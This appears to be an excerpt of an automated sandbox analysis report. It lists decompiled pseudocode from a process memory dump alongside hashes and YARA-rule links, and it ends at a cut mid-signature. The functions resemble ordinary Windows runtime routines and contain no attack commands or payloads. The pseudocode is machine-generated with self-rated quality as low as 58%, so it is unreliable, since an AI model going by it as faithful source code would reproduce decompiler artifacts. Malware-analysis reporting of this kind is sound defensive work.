                                                          0x0345c211
                                                          0x0345c216
                                                          0x0345c219
                                                          0x0345c21f
                                                          0x0345c222
                                                          0x0345c22c
                                                          0x0345c234
                                                          0x0345c23a
                                                          0x0345c23f
                                                          0x0345c245
                                                          0x0345c24b
                                                          0x0345c251
                                                          0x0345c25a
                                                          0x0345c276
                                                          0x0345c27d
                                                          0x0345c27d
                                                          0x0345c25c
                                                          0x0345c25c
                                                          0x00000000
                                                          0x0345c25e
                                                          0x0345c1a4
                                                          0x0345c1aa
                                                          0x0345c1b3
                                                          0x0345c265
                                                          0x0345c26c
                                                          0x0345c26c
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                          • Instruction ID: d8364eec6d688812da4952bb028b3cec08c508ca1aac812a7197b184407c505d
                                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                          • Instruction Fuzzy Hash: 3531F675E01746AFD704EBB5C480BEAF754BF42204F08416FE8185F302DB755A4ADBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034B7016, Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 76%
                                                          			E034B7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x352d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E034B6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E034B6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03457D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03479AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0347B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03454620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                          0x034b7016
                                                          0x034b701e
                                                          0x034b702b
                                                          0x034b7033
                                                          0x034b7037
                                                          0x034b703c
                                                          0x034b703e
                                                          0x034b7041
                                                          0x034b7045
                                                          0x034b704a
                                                          0x034b7050
                                                          0x034b7055
                                                          0x034b705a
                                                          0x034b7062
                                                          0x034b7062
                                                          0x034b705a
                                                          0x034b7064
                                                          0x034b7064
                                                          0x034b7067
                                                          0x034b7071
                                                          0x034b7096
                                                          0x034b709b
                                                          0x034b70a2
                                                          0x034b70a6
                                                          0x034b70a7
                                                          0x034b70ad
                                                          0x034b70b3
                                                          0x034b70b6
                                                          0x034b70bb
                                                          0x034b70c3
                                                          0x034b70c3
                                                          0x034b70c6
                                                          0x034b70cd
                                                          0x034b70dd
                                                          0x034b70e0
                                                          0x034b70e2
                                                          0x034b70e2
                                                          0x034b70ee
                                                          0x034b7101
                                                          0x034b70f0
                                                          0x034b70f9
                                                          0x034b70f9
                                                          0x034b710a
                                                          0x034b710e
                                                          0x034b7112
                                                          0x034b7117
                                                          0x034b7118
                                                          0x034b7118
                                                          0x034b70bb
                                                          0x034b711d
                                                          0x034b7123
                                                          0x034b7131
                                                          0x034b7131
                                                          0x034b7136
                                                          0x034b713d
                                                          0x034b713e
                                                          0x034b713f
                                                          0x034b714a
                                                          0x034b714a
                                                          0x034b7084
                                                          0x034b7088
                                                          0x00000000
                                                          0x034b708e
                                                          0x034b708e
                                                          0x034b7092
                                                          0x00000000
                                                          0x034b7092

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 673bb3fdf53a0fa434a0f063ef178c21c334ee885d505d758022379856d37f2d
                                                          • Instruction ID: 67b1c72694f974cfcab289f105c3d0a076398cbb317b96ecacfdd5ba2563b205
                                                          • Opcode Fuzzy Hash: 673bb3fdf53a0fa434a0f063ef178c21c334ee885d505d758022379856d37f2d
                                                          • Instruction Fuzzy Hash: B8317F766047519FC320DF29C940AABB7B5AFC8600F094A2EF9959F791E730E904C7B9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346A70E, Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 92%
                                                          			E0346A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3527b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3527b10 = 8;
					 *0x3527b14 = 0x3527b0c;
					 *0x3527b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0346A990(0x3527b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0346A840(__edx, __ecx, __ecx, _t52, 0x3527b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3527b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x3527b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3527b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L03454620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3527b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0347F3E0(_t50,  *0x3527b14, _t8 >> 3);
						_t28 =  *0x3527b14; // 0x771c7b0c
						__eflags = _t28 - 0x3527b0c;
						if(_t28 != 0x3527b0c) {
							L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x3527b14 = _t50;
						_t48 = _v12;
						 *0x3527b10 = _t9;
						goto L6;
					}
					 *0x3527b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                          0x0346a713
                                                          0x0346a714
                                                          0x0346a717
                                                          0x0346a71d
                                                          0x0346a720
                                                          0x0346a722
                                                          0x0346a727
                                                          0x0346a74a
                                                          0x0346a754
                                                          0x0346a75e
                                                          0x0346a768
                                                          0x0346a76a
                                                          0x0346a773
                                                          0x0346a78b
                                                          0x0346a790
                                                          0x0346a792
                                                          0x0346a741
                                                          0x0346a741
                                                          0x0346a743
                                                          0x0346a749
                                                          0x0346a749
                                                          0x0346a732
                                                          0x0346a73a
                                                          0x0346a797
                                                          0x0346a79d
                                                          0x0346a7a3
                                                          0x0346a7a9
                                                          0x0346a7b6
                                                          0x0346a7bc
                                                          0x0346a7ca
                                                          0x0346a7e0
                                                          0x0346a7e2
                                                          0x0346a7e4
                                                          0x034a9bf2
                                                          0x00000000
                                                          0x034a9bf2
                                                          0x0346a7ed
                                                          0x0346a7f2
                                                          0x0346a800
                                                          0x0346a805
                                                          0x0346a80d
                                                          0x0346a812
                                                          0x034a9c08
                                                          0x034a9c08
                                                          0x0346a818
                                                          0x0346a81b
                                                          0x0346a821
                                                          0x0346a824
                                                          0x00000000
                                                          0x0346a824
                                                          0x0346a7ae
                                                          0x00000000
                                                          0x0346a7ae
                                                          0x0346a73c
                                                          0x0346a73e
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d94801ea2b7487d4e4f623d7e3ee4ef3e032d16e5f43e560269d231c496ce3a
                                                          • Instruction ID: 9b3b49ba0d8da75cbf4392b9e6ff99d782f02bd44cf2eb82277a17c20b000a6a
                                                          • Opcode Fuzzy Hash: 6d94801ea2b7487d4e4f623d7e3ee4ef3e032d16e5f43e560269d231c496ce3a
                                                          • Instruction Fuzzy Hash: C931B2B16006049FC721DF18E880F5ABBF9FB9A710F14095AF015AF365E770D90ADB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0343AA16, Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E0343AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x352d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3527b9c; // 0x0
					_t53 = L03454620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0347B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0347F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03446C59(_t53, _t51, _t58) != 0) {
							_t28 = E03465E50(0x341c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0346B230(_v32, _v28, 0x341c2d8, 1,  &_v24);
								_t28 = E0343F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                          0x0343aa25
                                                          0x0343aa29
                                                          0x0343aa2d
                                                          0x0343aa30
                                                          0x0343aa37
                                                          0x0343aa3c
                                                          0x03494458
                                                          0x03494458
                                                          0x03494472
                                                          0x03494474
                                                          0x03494476
                                                          0x0343aa64
                                                          0x0343aa74
                                                          0x0349447c
                                                          0x03494483
                                                          0x03494492
                                                          0x0343aa52
                                                          0x0343aa54
                                                          0x0343aa5e
                                                          0x034944a8
                                                          0x034944ad
                                                          0x034944af
                                                          0x034944b6
                                                          0x034944b6
                                                          0x034944b9
                                                          0x034944bc
                                                          0x034944cd
                                                          0x034944d3
                                                          0x034944d6
                                                          0x034944e1
                                                          0x034944e1
                                                          0x034944e6
                                                          0x034944e8
                                                          0x034944fb
                                                          0x034944fb
                                                          0x034944e8
                                                          0x00000000
                                                          0x0343aa5e
                                                          0x03494476
                                                          0x0343aa42
                                                          0x0343aa46
                                                          0x0343aa48
                                                          0x0343aa4c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5bc23d5525e210f15016efe8c2641747f582e2070743fd7b4000252246fd8831
                                                          • Instruction ID: 9d964f37ad294fcab03026db804f34d2f61ffd5154b8f4a394667a6e8a3b2cff
                                                          • Opcode Fuzzy Hash: 5bc23d5525e210f15016efe8c2641747f582e2070743fd7b4000252246fd8831
                                                          • Instruction Fuzzy Hash: AA31B172A00219AFDF10EF65CD81A7FB7B9EF08600B05406BF801DF250E7749911DBA9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 034661A0, Relevance: .1, Instructions: 93COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 97%
                                                          			E034661A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03465E50(0x34167cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03509D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0343F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                          0x034661b3
                                                          0x034661b5
                                                          0x034661bd
                                                          0x034661c3
                                                          0x034661c7
                                                          0x034661d2
                                                          0x034661ff
                                                          0x034661ff
                                                          0x03466201
                                                          0x03466207
                                                          0x03466207
                                                          0x034661d4
                                                          0x034661d9
                                                          0x00000000
                                                          0x00000000
                                                          0x034661df
                                                          0x034661e2
                                                          0x00000000
                                                          0x00000000
                                                          0x034661e6
                                                          0x034661e8
                                                          0x034661ee
                                                          0x034661ee
                                                          0x034661f9
                                                          0x034a762f
                                                          0x034a7632
                                                          0x034a7635
                                                          0x034a7639
                                                          0x034a7640
                                                          0x034a766e
                                                          0x034a7675
                                                          0x00000000
                                                          0x00000000
                                                          0x034a7681
                                                          0x034a7689
                                                          0x034a768d
                                                          0x034a7691
                                                          0x034a7695
                                                          0x034a7699
                                                          0x034a76af
                                                          0x034a76b5
                                                          0x034a76b7
                                                          0x034a76b7
                                                          0x034a76d7
                                                          0x034a76dc
                                                          0x00000000
                                                          0x034a76dc
                                                          0x034a76a2
                                                          0x034a76a9
                                                          0x034a7651
                                                          0x034a7653
                                                          0x034a7653
                                                          0x034a7656
                                                          0x034a7656
                                                          0x00000000
                                                          0x034a7656
                                                          0x034a7644
                                                          0x034a7646
                                                          0x034a7648
                                                          0x034a7648
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 47c1bffd825aba892323c5788be2cc99942479baa667a07b3f072d04a2675648
                                                          • Instruction ID: 2fa130b2a052aed4e0c8fab4b4f659abe2349e4075abe093a7a8f326d68036e4
                                                          • Opcode Fuzzy Hash: 47c1bffd825aba892323c5788be2cc99942479baa667a07b3f072d04a2675648
                                                          • Instruction Fuzzy Hash: A53159716057018FD320CF59C940B6BFBE4AB98B10F09496EA9A49B361E774D844CB9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03474A2C, Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E03474A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x352d360 ^ _t62;
				_v8 =  *0x352d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03452280(_t26, 0x3528608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0344FFB0(_t41, _t51, 0x3528608);
						L2:
						 *0x352b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0347B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03452280(_t28, 0x3528608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0344FFB0(_t42, _t53, 0x3528608);
							if(_t53 != 0) {
								L034577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0344FFB0(_t41, _t51, 0x3528608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                          0x03474a2c
                                                          0x03474a34
                                                          0x03474a3c
                                                          0x03474a3e
                                                          0x03474a48
                                                          0x03474a4b
                                                          0x03474a4d
                                                          0x03474a51
                                                          0x03474a9c
                                                          0x00000000
                                                          0x00000000
                                                          0x03474aa3
                                                          0x03474aa8
                                                          0x03474aad
                                                          0x03474ab1
                                                          0x03474ade
                                                          0x03474ae3
                                                          0x03474a5a
                                                          0x03474a62
                                                          0x03474a6a
                                                          0x03474a6e
                                                          0x034af203
                                                          0x03474a84
                                                          0x03474a88
                                                          0x03474a89
                                                          0x03474a8a
                                                          0x03474a95
                                                          0x03474a95
                                                          0x03474a79
                                                          0x03474a80
                                                          0x03474af2
                                                          0x03474af4
                                                          0x03474af9
                                                          0x03474aff
                                                          0x03474b01
                                                          0x03474b03
                                                          0x03474b08
                                                          0x034af20a
                                                          0x034af212
                                                          0x034af216
                                                          0x034af216
                                                          0x03474b08
                                                          0x03474b13
                                                          0x03474b1a
                                                          0x034af229
                                                          0x034af229
                                                          0x03474b1a
                                                          0x03474a82
                                                          0x00000000
                                                          0x03474a82
                                                          0x03474ab7
                                                          0x03474acd
                                                          0x03474acd
                                                          0x03474ad5
                                                          0x03474ada
                                                          0x00000000
                                                          0x03474ada
                                                          0x03474ac2
                                                          0x03474acb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x03474acb
                                                          0x03474a53
                                                          0x03474a53
                                                          0x03474a58
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5fee5999f25ac4bed64124721c8c686ecc2439a70a330b0cde9c36983e13fac7
                                                          • Instruction ID: c917ee8513393320f5cc1d894ca7c9dcfa9e2d1693fe11836a31f978d9e2122d
                                                          • Opcode Fuzzy Hash: 5fee5999f25ac4bed64124721c8c686ecc2439a70a330b0cde9c36983e13fac7
                                                          • Instruction Fuzzy Hash: 5B31EF362017549FC721EE96C945B7BBBA8FB91610F08046BE8660F351C7B0E805CB8E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 03478EC7, Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E03478EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x352d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03464E70(0x35286e4, 0x3479490, 0, 0);
					if( *0x35253e8 > 5 && E03478F33(0x35253e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x35253e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x35253e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x341bc46;
						_t48 = E034B7B9C(0x35253e8, 0x341bc46, _t67, 0x35253e8, _t70,  &_v140);
					}
				}
				return E0347B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                          0x03478ec7
                                                          0x03478ed9
                                                          0x03478edc
                                                          0x03478ee6
                                                          0x03478ee9
                                                          0x03478eee
                                                          0x03478efc
                                                          0x03478f08
                                                          0x034b1349
                                                          0x034b1353
                                                          0x034b135d
                                                          0x034b1366
                                                          0x034b136f
                                                          0x034b1375
                                                          0x034b137c
                                                          0x034b1385
                                                          0x034b1390
                                                          0x034b1391
                                                          0x034b139c
                                                          0x034b139d
                                                          0x034b13a6
                                                          0x034b13ac
                                                          0x034b13b2
                                                          0x034b13b5
                                                          0x034b13bc
                                                          0x034b13bf
                                                          0x034b13c2
                                                          0x034b13c5
                                                          0x034b13c8
                                                          0x034b13cb
                                                          0x034b13ce
                                                          0x034b13d1
                                                          0x034b13d4
                                                          0x034b13d7
                                                          0x034b13da
                                                          0x034b13dd
                                                          0x034b13e0
                                                          0x034b13e3
                                                          0x034b13e6
                                                          0x034b13e9
                                                          0x034b13f6
                                                          0x034b1400
                                                          0x034b1400
                                                          0x03478f08
                                                          0x03478f32

                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.903134301.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: true
                                                          • Associated: 0000000A.00000002.903329978.000000000352B000.00000040.00000001.sdmp Download File
                                                          • Associated: 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8c46fb9480fe9f4f61005f94fc5f01ab85be9e5fe3c73395121601a8ee062b1
                                                          • Instruction ID: 929d3f8d4c5cdef6c34600c343fca266e6e5cb6d720c6873f37ccb71f064d345
                                                          • Opcode Fuzzy Hash: d8c46fb9480fe9f4f61005f94fc5f01ab85be9e5fe3c73395121601a8ee062b1
                                                          • Instruction Fuzzy Hash: 52418EB1D002189EDB20CFAAD981AAEFBF4BB49310F5041AEA519AA240E7705A85CF54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0346E730, Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0346E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
